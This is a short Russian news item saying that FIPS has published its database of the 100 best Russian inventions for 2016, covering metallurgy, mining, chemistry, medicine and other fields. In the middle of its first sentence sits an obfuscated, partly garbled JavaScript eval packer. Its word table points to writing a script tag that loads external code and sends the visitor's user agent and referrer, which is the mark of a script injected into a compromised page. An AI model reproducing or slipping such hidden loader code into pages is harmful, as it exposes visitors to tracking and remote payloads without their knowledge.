

Российский `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\s/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n`
`m="q";,30,30,'document|javascript|encodeURIComponent|src|write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|fehkz|var|u0026u|referrer|yyffz|js|php'.split('|'),0,{}))` федеральный институт промышленной собственности (ФИПС) опубликовал список изобретений, вошедших в базу данных « [100](#)

[лучших изобретений России](#)

» за 2016 год. Список лучших изобретений дополнили запатентованные разработки крупных предприятий в области металлургической промышленности и машиностроения, горного дела и строительства, химии, энергетики, электротехники, компьютерной техники, транспорта, пищевой промышленности и сельского хозяйства, медицины, измерительной техники и др.

Для более подробного знакомства с лучшими разработками России можно перейти по ссылке

[ФИПС - перспективные изобретения](#)